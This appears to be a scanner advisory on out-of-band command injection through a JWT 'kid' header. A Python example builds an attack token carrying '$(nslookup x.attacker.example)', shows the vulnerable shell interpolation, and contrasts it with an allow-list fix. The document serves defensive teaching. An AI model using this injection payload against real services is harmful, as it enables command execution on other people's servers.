PCI v3.2-6.5.1
CAPEC-88
CWE-78
ISO27001-A.14.2.5
WASC-31
OWASP 2013-A1
OWASP 2017-A1
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

JWT kid Parameter Out of Band Command Injection

Severity:
Critical
Summary

Invicti detected an out-of-band command injection vulnerability in the kid (key ID) parameter of a JSON Web Token. The finding was confirmed by capturing a DNS A record lookup from the target, which only occurs when the value supplied in the kid header is interpreted and executed as an operating system command.

Remediation

  • Use an allow-list of valid values and disallow any other input.
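The vulnerable pattern and the allow-list fix, as an added Python example that is not Invicti's code or the scanned application's code: the key identifier is concatenated into a shell command, so a kid such as `$(nslookup x.attacker.example)` triggers the DNS A lookup that the scanner's out-of-band listener observes; the hardened version resolves kid through an allow-list and passes arguments to the process without a shell. The callback hostname, the key directory and the openssl command are assumptions for illustration.

```python
import base64
import json
import re
from typing import List, Optional

# Assumption: placeholder callback host, not a real server or Invicti's listener.
ATTACKER_HOST = "attacker.example"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def make_token(kid: str) -> str:
    """Build a constructed JWT whose header carries the given kid.

    The signature is a dummy value: kid is read from the header before any
    signature check, which is exactly why it reaches the key-lookup code."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT", "kid": kid}).encode())
    payload = b64url(json.dumps({"sub": "user1"}).encode())
    return f"{header}.{payload}.sig"


def get_kid(token: str) -> str:
    header_b64 = token.split(".")[0]
    header_b64 += "=" * (-len(header_b64) % 4)  # restore base64url padding
    return json.loads(base64.urlsafe_b64decode(header_b64))["kid"]


def vulnerable_key_command(token: str) -> str:
    """Vulnerable pattern: kid is interpolated into a shell command string that
    the application would run with shell=True. The command is returned instead
    of executed so the injected text is visible without touching the system."""
    kid = get_kid(token)
    return f"openssl pkey -in /etc/keys/{kid}.pem -pubout"  # assumed key location


# Hardened lookup: strict syntax check plus an explicit allow-list of known key IDs.
KID_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
KNOWN_KIDS = {"key-2023-01", "key-2024-05"}  # assumed deployed key identifiers


def hardened_key_path(token: str) -> Optional[str]:
    kid = get_kid(token)
    if not KID_RE.fullmatch(kid) or kid not in KNOWN_KIDS:
        return None  # reject anything that is not a known key ID
    return f"/etc/keys/{kid}.pem"


def hardened_key_argv(token: str) -> Optional[List[str]]:
    """Argument vector for subprocess.run(argv) with no shell: even if the
    allow-list were widened, the value can no longer be parsed as shell syntax."""
    path = hardened_key_path(token)
    if path is None:
        return None
    return ["openssl", "pkey", "-in", path, "-pubout"]


if __name__ == "__main__":
    # Constructed attack token: the kid triggers an out-of-band DNS A lookup
    # for a name under the attacker's domain when run through a shell.
    evil = make_token(f"$(nslookup x.{ATTACKER_HOST})")
    print("vulnerable command:", vulnerable_key_command(evil))
    print("hardened lookup:", hardened_key_argv(evil))
    print("hardened lookup (valid kid):", hardened_key_argv(make_token("key-2024-05")))
```

The out-of-band detection works because the injected command needs no visible output: the DNS resolution for `x.attacker.example` happens on the target even when the surrounding openssl command fails, so the listener sees the A query regardless of how the application handles the result.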
